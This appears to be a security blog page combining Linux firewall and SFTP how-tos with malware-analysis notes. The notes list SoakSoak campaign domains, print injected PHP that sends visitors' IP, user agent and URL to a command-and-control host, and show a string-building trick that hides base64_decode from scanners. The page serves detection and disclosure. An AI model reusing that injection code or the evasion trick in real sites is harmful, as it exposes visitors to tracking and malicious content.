Blocking HTTP requests via Iptables for a specific domain

In a previous article, we showed how to block specific domains at the DNS level using iptables. Today, we will expand on that and show how to also block HTTP requests for a specific domain (or URL).

Iptables String Matching

Iptables string matching is very powerful and easier to use than the hex-string module we used before. When you specify -m string --string, it activates the string module, which inspects the packet content for the keyword you are looking for.
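For illustration, here is a minimal sketch of the idea (the domain blocked-example.com is a placeholder, not from the original post, and the rule is shown on the INPUT chain; adjust the chain to your setup). It drops HTTP packets whose payload contains the Host header of the domain you want to block. Note that the string module requires an --algo option (bm or kmp):

iptables -A INPUT -p tcp --dport 80 -m string --string "Host: blocked-example.com" --algo bm -j DROP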

Continue reading “Blocking HTTP requests via Iptables for a specific domain”

Let’s Encrypt: Unable to install the certificate

You’ve heard it’s important to install Let’s Encrypt (LE). You spin up your Ubuntu 18.04 machine and try to use https://certbot.eff.org/.

You run the command:

certbot --apache -d domain.com

You are greeted with:

Continue reading “Let’s Encrypt: Unable to install the certificate”

How To List UFW Rules When The Application is Inactive or Disabled

When working on your server, you might need to disable the Uncomplicated Firewall (UFW). When you do, you’ll notice that UFW doesn’t display your rules while it is inactive.
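One common workaround, offered here as a hedged aside rather than necessarily what the full post describes: UFW keeps its rule definitions on disk, so you can read them directly even while the firewall is disabled. On Ubuntu the default paths are:

cat /etc/ufw/user.rules     # IPv4 rules added via the ufw command
cat /etc/ufw/user6.rules    # the IPv6 equivalents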

Continue reading “How To List UFW Rules When The Application is Inactive or Disabled”

Working with UFW – Uncomplicated Firewall – on Ubuntu

This is not a comprehensive guide to the UFW application.

It is a basic orientation for UFW. It should provide insights you may not be aware of, even though many assume you already know them.
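For orientation, a few everyday UFW commands (a hedged sketch; they may or may not be the ones the full post covers, and port 22 is just an illustrative SSH example):

sudo ufw allow 22/tcp      # permit SSH before enabling so you don't lock yourself out
sudo ufw enable            # turn the firewall on
sudo ufw status verbose    # list the active rules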

Continue reading “Working with UFW – Uncomplicated Firewall – on Ubuntu”

How do you enable SFTP on your Ubuntu server?

SFTP (the SSH File Transfer Protocol) is a file transfer protocol that runs over the Secure Shell (SSH) protocol, so the communication is protected as it moves from one point to another.

PSA: FTP is considered an insecure transfer protocol and should be avoided.

This article assumes you are trying to create new SFTP users on your Linux machine. In this example we’ll be using Ubuntu 18.04.

Enabling and Creating SFTP users:

SFTP is enabled in your SSH daemon configuration file, typically located at /etc/ssh/sshd_config. Open the file and add the following at the end:

# override default of no subsystems
# (comment out any existing Subsystem sftp line first; sshd will not start with a duplicate definition)
Subsystem       sftp    /usr/lib/openssh/sftp-server
Match Group sftp
    X11Forwarding no
    AllowTCPForwarding no
    ForceCommand internal-sftp

Options explained:

Subsystem: An abstraction layer that allows you to invoke remote commands. In this instance, we’re invoking sftp-server.
Match: Allows you to limit directives to a subset of connections; here we’re limiting them to a specific group, sftp. Only users in the sftp group will be able to SFTP into the server.
X11Forwarding: A special case for remote tunneling. Unfortunately, it can be used maliciously by a bad actor, so it’s recommended you disable it unless you know what you’re doing.
AllowTCPForwarding: “TCP forwarding” allows you to encapsulate any other protocol (based on TCP, of course) inside an already established SSH connection. There are legitimate uses for this, but we don’t want SFTP users doing it without appropriate planning.
ForceCommand: The remote user can only execute the statically defined command. Specifying internal-sftp forces the use of an in-process SFTP server that requires no support files when used with ChrootDirectory (a sketch follows below).
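As a hedged extension of the configuration above, and not something the original post spells out, the ChrootDirectory mentioned under ForceCommand would sit inside the same Match block:

Match Group sftp
    ChrootDirectory %h
    ForceCommand internal-sftp
    X11Forwarding no
    AllowTCPForwarding no

Keep in mind that sshd requires every component of the chroot path to be owned by root and not writable by group or others, so in practice users are usually given a writable subdirectory inside the jail rather than write access to the chroot itself.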

Once you add this to the SSH config file you need to restart OpenSSH:

service ssh restart

Now you need to add new SFTP users and assign each one to the sftp group referenced by the Match block. If that group doesn’t exist yet, create it first:

groupadd sftp
useradd -m -g sftp [newsftpuser]

Set the password:

passwd [newsftpuser]

Now you can test your SFTP connection from a different server:

sftp [newsftpuser]@[serverIPaddress]
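Once connected, a quick sanity check might look like this (the file name is just a placeholder):

sftp> pwd
sftp> put test-upload.txt
sftp> ls
sftp> exit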

Happy SFTP’ing!


What is Cross-Site Contamination and How to Prevent it

If you suffer multiple reinfections and your site is one of many in an account, the odds are high that you’re suffering from cross-site contamination.

Cross-site contamination is when a site is negatively affected by neighboring sites on the same server due to poor isolation at the server or account-configuration level. This phenomenon is one of the biggest factors in the debate over whether VPS, dedicated, or shared hosting is secure or insecure.

The greatest contributor to cross-site contamination is what I call soup-kitchen servers: environments riddled with every installation and configuration known to man. They might include tens or hundreds of different sites on different platforms (e.g., Drupal, Joomla, WordPress). The problem isn’t the quantity itself, but the mix. They might also include sites in different phases of their lives: development, staging, production.

The biggest culprits of these configurations are agencies, freelance developers, and aspiring hosts.

A Primer in Functional Isolation

The concept of functional isolation is not new, but it can be difficult to employ. It’s the idea that an environment should be used for only one purpose. A classic violation is using a web server as an email server, or vice versa. The general rule of thumb is that using an environment for more than one purpose is bad practice. Theory and practice, however, are always two different things.

Most organizations (and individuals) wouldn’t dream of having a server per site, and in many ways it’s impractical. So my recommendation is to break things out by three criteria: technology, function, and stage.

  • Technology: Don’t mix technologies if you can help it. For instance, don’t deploy Drupal sites alongside WordPress sites. Each platform is fundamentally different, and it’s easier to harden a homogeneous environment than to keep track of everything that exists in a mixed one.
  • Function: Don’t mix server functions. If you have an email server, don’t also use it as a file server or web server. Use the environment for what it is intended for.
  • Stage: Don’t mix sites at different stages of their life. Stage refers to whether a site is in development, testing, or production. At a minimum, you should have two environments: development and production. Three (adding testing) would be ideal, but for many that’s less practical or cost-prohibitive.

The next thing you want to think about – accounts.

Shared hosts have a bad reputation for poor security, but that’s not entirely accurate. While it’s true there have been challenges in the past, we’re talking circa 2010/2011. These days, the problem with shared hosts is not the hosts themselves, but the one-to-many relationship website owners have with their accounts and sites.

Example: One account has 100 sites under it.

In these configurations, the attacks we’re seeing are not moving laterally between accounts on the shared host, but rather within the same account.

When configuring your account, it’s important to create a unique user for each site and to set permissions so that one site’s user can’t read or modify another user’s files on the same account.
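For illustration only, a minimal sketch of that idea (the site name and path are hypothetical, and a web server running as its own user may still need read access, which a full setup has to account for):

useradd -m -d /var/www/site-one site-one-user    # one dedicated user per site
chown -R site-one-user:site-one-user /var/www/site-one
chmod -R o-rwx /var/www/site-one                 # other users on the account get no access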

Website Firewalls and Cross-Site Contamination

The most frustrating thing for a website owner is deploying all the recommended security controls and continuing to get infected. We see it all the time: customers deploy our controls, including our Firewall, and a reinfection still happens.

In 9 out of 10 instances, reinfections occur because of internal attacks (not external). The challenge is that confirming this requires investigation and education.

  • Internal Attacks: Attacks where the bad actor is able to exploit internal weaknesses in the environment to perform nefarious acts (example: cross-site contamination) by moving laterally throughout the environment.
  • External Attacks: Attacks where the bad actor is able to exploit weaknesses remotely to gain access and proceed to perform a nefarious act (example: exploiting a software vulnerability remotely – think SQLi).

Seeing an infection on your site doesn’t mean the site itself is the one being exploited. If you continue to experience multiple reinfections, it’s worth looking at your entire environment to see whether any of the conditions described above might be contributing to the issue.

The biggest contributors we find when running our reinfection investigations include:

  • Forgotten websites on the same account
  • Misconfigured websites on the same account
  • Websites that have not been secured on the same account

If you’re a website owner wondering whether this affects you, open a dialog with your developer or host and ask what their approach is to handling multiple websites on the same server and account. Ask whether they manage other sites on your account and how they can assure you that your site is properly isolated from its neighbors. If you continue to experience issues, the odds are there is a misconfiguration somewhere.

Preventing Cross-Site Contamination

The approach I propose here is simple, cost-effective, and a first step toward improving your overall security posture. It will pay dividends in reducing the risks associated with cross-site contamination while also streamlining your maintenance activities.

Functional isolation is as old a concept as Least Privilege or Defense in Depth, but perhaps the least discussed. I would extend it and encourage you to consider not just functional isolation, but account isolation as well. Combined, these two will dramatically reduce the threat of cross-site contamination.

A few last thoughts:

  • If you decide to deploy something like the Sucuri Firewall, make sure that it’s deployed on all sites on the same account, and you’ve followed all the steps to ensure direct access to the server is restricted.
  • If you only care about one site, and not the other 99, then move that one site into its own environment.
  • If you have one server doing all things, stop! Leverage your servers and accounts based on the recommendations I provided above.
  • If you’re a website owner, ask questions and become an involved member of the process. Security is your responsibility as much as it is your designer’s or host’s.

If you need help with a hacked site or are struggling with cross-site contamination, we offer professional website malware removal services and will protect and monitor your website.

RevSlider MalFrames – SoakSoak

The RevSlider SoakSoak malware campaign started with the soaksoak.ru domain (hence the name). However, over the last two weeks it has mutated and used different domains as the initial malware intermediary.

This is the full list so far:

  1. soaksoak.ru: The first one on the list. We identified more than 100,000 sites redirecting to it.
  2. 122.155.168.105: Started just after soaksoak, leveraging the /collect.js redirection. Almost 10,000 sites were blacklisted and compromised with it.
  3. ads.akeemdom.com
  4. wpcache-blogger.com: The second biggest campaign after soaksoak. More than 50,000 sites compromised and still going.
  5. theme.wpcache-blogger.com
  6. phoenix-credit.com: The one currently active. It also leverages the /collect.js redirection and has compromised more than 11,000 different sites.

We will keep updating this list as the domains change and the attacks mutate.

Fake botsvsbrowsers domain

The domain botsvsbrowsers.com is quite popular and is used for comparing user agents (browsers) and checking whether a specific request comes from a valid user or a bot.

Piggybacking on its popularity, the bad guys created the domain botsvsbrowsers.biz (.biz versus .com) to be used as a command and control server in SEO spam campaigns.

This is the code we are seeing on compromised sites:

echo file_get_contents('http://botsvsbrowsers.biz/Statistic/Stat.php?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent)...
'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&addcheck=');

Which basically contacts botsvsbrowsers.biz/Statistic/Stat.php on every page load, sending the client IP address, user agent, and URL, and the remote server decides what to inject for that user. Most of the time we are seeing plain SPAM, but they are probably serving other malicious code as well.

So if you see any content being loaded from botsvsbrowsers.BIZ (or the IP address 46.165.222.93), you know it is malicious.
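If you want a quick check of your own files, a hedged starting point (the web root path is a placeholder for wherever your site lives, and this only catches the injection when it is not further obfuscated):

grep -rIn "botsvsbrowsers.biz" /var/www/html
grep -rIn "46.165.222.93" /var/www/html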

PHP.net blacklisted by Google

We woke up this morning to many reports and people asking why the PHP.net site is being blacklisted. We did not get a chance to analyze it while it was compromised, but it seems that one of their JavaScript files (static.php.net/www.php.net/userprefs.js) was modified to inject a malicious iframe from http://lnkhere.reviewhdtv.co.uk/stat.htm.

Here is the suspected bad code: http://pastebin.com/raw.php?i=nAess4xL

It seems the PHP team has already fixed it and requested that Google clear the warning. If anyone has more info, we would love to hear it.

Do you still look for base64_decode?

A common keyword that people use to find hidden injections on websites is base64_decode. You often see injections that look like eval ( base64_decode or eval ( gzinflate ( base64_decode being used by attackers.

So most web security tools have signatures to look for it (especially on WordPress).

Well, the attackers know about it as well, and we are starting to see some interesting variations. For example, instead of injecting base64_decode directly, they are injecting it as a variable:

$g___g_='base'.(32*2).'_de'.'code';

So instead of calling base64_decode directly, they build it from 'base' + (32*2) + '_de' + 'code', a simple trick that allows them to bypass many security filters.
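As an illustrative follow-up (a narrow sketch keyed only to this particular variation, with a placeholder web root), you can hunt for string-built function names instead of the literal keyword:

# flag PHP files that concatenate quoted fragments such as '_de'.'code'
grep -rIn --include='*.php' "'_de'[[:space:]]*\.[[:space:]]*'code'" /var/www/html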